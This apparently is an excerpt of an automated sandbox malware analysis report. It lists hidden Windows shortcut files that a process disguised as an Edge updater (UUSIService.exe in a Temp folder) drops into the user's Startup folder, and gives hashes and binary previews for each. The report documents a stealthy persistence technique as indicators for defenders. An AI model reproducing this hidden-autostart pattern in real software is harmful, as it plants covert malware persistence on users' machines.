Preview:	L..................F...."..............7....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........\.{8........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_4e640fe239e64907858c8d5be31e6598.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:16 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92593316047497
Encrypted:	false
SSDEEP:	24:8ZYPHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8gHfNDp2l9tJRBzfNZ47/yg
MD5:	E4CB1C8EBC68B48739DAE12B23D42D87
SHA1:	10D5B4A207996AC680FC85ECF40A899FEE290226
SHA-256:	2C6DEB53C23B8CB870AF79671D1C933BE1750ED3B5EC231969F021D33924958D
SHA-512:	482CA571E7D3CFC2591DA88A6511CDEFF06DBE242FB0A10CD4EF1331ADE049685731D2A3B16238C88FB46D1D1F55A667363A6C62E17E8FB539CD3969C8FE4CDE
Malicious:	false
Preview:	L..................F...."...........:.......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_5170c447d16a4c4dbdcebc509470a9cd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:13 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.912709252458982
Encrypted:	false
SSDEEP:	24:8ZgHWDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8+HWDp2l9tJRBzfNZ47/yg
MD5:	1739C976C63B8194477022E763302DC5
SHA1:	BDA5FA710694604D5BE800194174C30E0AD90134
SHA-256:	60CBD79D54C122914CAD4E03656D02EB9BA2C6C64DA9A5BF8BCA6F83C03117A4
SHA-512:	6A6E21F322D9E4F1A99FEDA9D6795BA1BD8E86EF2F3EC8C19FE5FAAB88E768F62E4F5401BF1F22E8E63EBD4BB8195E2296849A74A7BDC7104049E6134B1ED95E
Malicious:	false
Preview:	L..................F...."...........B.FA....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........4..A........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_544d4f2bbc46454092f403239135762f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:55 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.92396962350875
Encrypted:	false
SSDEEP:	24:8Z0HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8yHfNDp2l9tJRBzfNZ47/yg
MD5:	863A6A1727C5C2A69676012FCE057772
SHA1:	F7EA2A84D908E2DD227F940648D9E2904F5B3FA2
SHA-256:	3E3B85F124A0218AC538D99C53DA0486DCE863D1CDCD34B035CDA53C2C3F9E71
SHA-512:	E2C0CF5B11B8359CFD359E6D096C3A4060933E355C526A913B7D26F0883A3C8CBCB7DCDAD38CAF9784DC6F75E3FB01007AA25750D602286D66EBAFB608FF6962
Malicious:	false
Preview:	L..................F...."...........#.6....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_54cf3eddcc384ce0bcfe40ada528f9c7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:43 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.921220348707755
Encrypted:	false
SSDEEP:	24:8ZhHLSDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:83HLSDp2l9tJRBzfNZ47/yg
MD5:	DA779AB8D619FC5149664B3F5DEBFAB2
SHA1:	B7A7A5A181B83DB383FEA491652364925B38C460
SHA-256:	06744A947AF80CE80809B189CA45C683FE2C8EF86F23640CB3D6DA48E332C3CE
SHA-512:	6091561AA396F2710D5432C39BAF1308D033E3EA8B9C9C5BA2450FE6A3A3ACC2A9A052066211A412AB8360B7FC3B771BC8B67111188B41A6F97DE14D09461807
Malicious:	false
Preview:	L..................F....".............%S....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S............%S........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_59312de00bf7418e92db32d12b986b9d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:12 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926441209843609
Encrypted:	false
SSDEEP:	24:8ZOLHJcDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:84LHeDp2l9tJRBzfNZ47/yg
MD5:	E33F8B5C3E637F5EB5EA2198FF4123ED
SHA1:	5767534F701D7B29B2591895C514B8CD17067181
SHA-256:	47D5AEB0D13C8C502B973A4B5ADA2749EA40054FD53B949687ED0FFB2951CB8D
SHA-512:	83D93E19F36A3F70DE64CC34A1C6995E5038B8FDBACA7F3EC7FEF0A955A9E2BCFDAE624102456811DC65C42CE0A76404D1165E2ABBEAB973BEFC072F0901CAEB
Malicious:	false
Preview:	L..................F...."...........3'.@....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........`..@........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6222ebb440bb43c7b9c768da3af11750.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:14 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.929675317597106
Encrypted:	false
SSDEEP:	24:8Z9HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8THfNDp2l9tJRBzfNZ47/yg
MD5:	80DDC07D20B8441AFA16D779241CAB7F
SHA1:	12FC7A4F89E3642EC9437248B75B8C6CA57370D3
SHA-256:	F8B828421CA83DE3B7386F48F86710FC939726D59A2708713618EE332ED8562F
SHA-512:	A3188F615FBF8764ECE0D7D1254FD9008A329CD84987C8743FABDDB4E671156627BA825D9C7BBAA7C423310B779BC7F064BDFA51C614057B6284E38A41542C4D
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_63069add25714d9da3a8b41cf36ac0a6.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:03 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.926893132836852
Encrypted:	false
SSDEEP:	24:8Z4HfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:82HfNDp2l9tJRBzfNZ47/yg
MD5:	7B9C726DE2044F90C03007DEA66E3083
SHA1:	F2224C722054C1E5C878A7C625079FCED8DC1E26
SHA-256:	0690593CD714AF2582756E1761E6D524504E288D4B420E6A8C2B5BEA5C81D664
SHA-512:	67A0C7309D17FDDC88BCFA72F8C7C8DCAA1FA4D5AD65C16ACD0D6D395DA875C5F34282001C35038D18928EE2A61077DE15FEA03FD8EB2BE3A74A34E972B8D4A6
Malicious:	false
Preview:	L..................F...."...........+A......0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_68353cd852cf4c8291d2879f1ca2e017.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:27 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9196710691195475
Encrypted:	false
SSDEEP:	24:8ZaHvVDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8kHdDp2l9tJRBzfNZ47/yg
MD5:	7A0A97617ABA4903549F25AEE0724423
SHA1:	4C2AD16C9D26510244801EACA935109670EF7728
SHA-256:	D3545A21F87A69FCD48D247A0ED9F67B0D9151462BA46558322D0D3DE53D5623
SHA-512:	AAC383FF895F4DEF5766843F927895968C5F042FD7BCFFC89A507666610285CE1C3F86118CA3CFFCB7CBF445D797AFBA586E8F877A3A4EFE482F75B1CAD7D26A
Malicious:	false
Preview:	L..................F...."...........q..I....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........+4.I........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6a9254444906492c8c8f284624ca1f37.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:15 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.927915162131801
Encrypted:	false
SSDEEP:	24:8ZFHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8bHfNDp2l9tJRBzfNZ47/yg
MD5:	E94879A811A7A63ABEC2A20B58C373BA
SHA1:	F89CBAC9131DBEBB8A2643E8577B245605A71EF7
SHA-256:	6840E9B64C9934D5664B14946E8369EB87DB559988968360C2C0F2075EFFC200
SHA-512:	34F426C8C8598491DEC63349FCA1044D0FFD770408A59241C7F5FAB4CF4E083819529CECE1C30124AB26A64B21B9145A025B85A090420F1D89EE5F3166E74C22
Malicious:	false
Preview:	L..................F...."............w$.....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_6d32a083e4f54b468efef75cad3ace29.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:42 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.922940787128204
Encrypted:	false
SSDEEP:	24:8ZvLHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8xLHfNDp2l9tJRBzfNZ47/yg
MD5:	935E0122F44957679BE8AB8F521A58DE
SHA1:	FDF7AE4EA2417C73F0BE54BD35A7C42B477E7B8B
SHA-256:	FCC1A7E5F2DF73A8BC736303B1526081DCB14003C282D75EB2FB728DEDD306B1
SHA-512:	DF91E1875781758F8BE4A895F85FF2D6CB9663146F97E6A5ABE94DA232FFEBC6847F177F9666AE0878A87E5B99702E8731ECC8698B7BD65FD8EB3D0EEB628C07
Malicious:	false
Preview:	L..................F...."...................0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_70c3b1e53cb04dfab6f97eb43615a240.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:39 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.924013215751204
Encrypted:	false
SSDEEP:	24:8Z2HyDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8gHyDp2l9tJRBzfNZ47/yg
MD5:	8EE63F58536CE06E0285AEF146C223A5
SHA1:	1FE35E27E6E8323155AEC8B8D948666B0F81B69C
SHA-256:	3255395641D1CBBCCC86E9059645DD980200521BB9C3AADA8DF3FC0F8780DF57
SHA-512:	2E75C165B3001665CEB3B723F3B5A79708D35CE6544BD1FC411B47F0397ABAD905C5F6F56E27C9681404E8E99093EC2C48E95255BF1B833CC6DA2E41AFE6102B
Malicious:	false
Preview:	L..................F....".............HQ....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S.............P........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_711b254958554f49b23c601b912e6740.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:18:26 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.929591608066419
Encrypted:	false
SSDEEP:	24:8Z2iHfNDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8wiHfNDp2l9tJRBzfNZ47/yg
MD5:	4BED9CFE682083DB4087B16AE5DD7AA4
SHA1:	A5118874E7684B6BAADF2B064A2EDC39FDB213DD
SHA-256:	8024910B5A97487F481D3E81DB4364E58A2AEDAAACA751A223FA4A71D88A800D
SHA-512:	6299554AD7516D4B113EE0BDA4C939485520A325797F7C02535628E498D55517E6E620FDAEDDACB98D850D21E742EADDE7894C090FC9DD925262D3C537691031
Malicious:	false
Preview:	L..................F...."..............%....0h.......j......................(.:..DG..Yr?.D..U..k0.&...&.......$..S..........%H..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2KY4B...........................^.A.p.p.D.a.t.a...B.P.1.....KY2B..Local.<......EW<2KY4B....[.......................v.L.o.c.a.l.....N.1.....KY6B..Temp..:......EW<2KY6B....^.....................N..T.e.m.p.....`.1.....KY6B..EDGEUP~1..H......KY6BKY6B....8......................be.E.d.g.e.U.p.d.a.t.e.r.....l.2..j..KY5B".UUSISE~1.EXE..P......KY6BKY6B....v.......................0.U.U.S.I.S.e.r.v.i.c.e...e.x.e.......o...............-.......n...........M.._.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe..8.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.U.U.S.I.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......284992...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UUSIService_73f188d324004f71bb8d2d5f0076f049.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Fri Oct 11 07:17:42 2024, mtime=Fri Oct 11 07:19:37 2024, atime=Fri Oct 11 07:17:41 2024, length=27136, window=hide
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	4.9189838779473485
Encrypted:	false
SSDEEP:	24:8ZdHyDp2lXttXZRelgK9kztZwIZecyAFa7igk3qygm:8vHyDp2l9tJRBzfNZ47/yg
MD5:	5EB1CF4C4C9C9E5D4AA31993F38C0F5D
SHA1:	100C20811947597C555092BAFCF0CAB9262C0264
SHA-256:	68220FB326080A39DEB63EC651FF9376BD6C21173D7F57CBD04B85FAA03E066A
SHA-512:	CA64DCE038B5AD3FF6B613906CDE6357C4591243A6915E16EF25033178FABFFF3F2494666D46E23160C5E1273C6F9317048C9A8E7BC9C81559359A5A679BA5B3
Malicious:	false
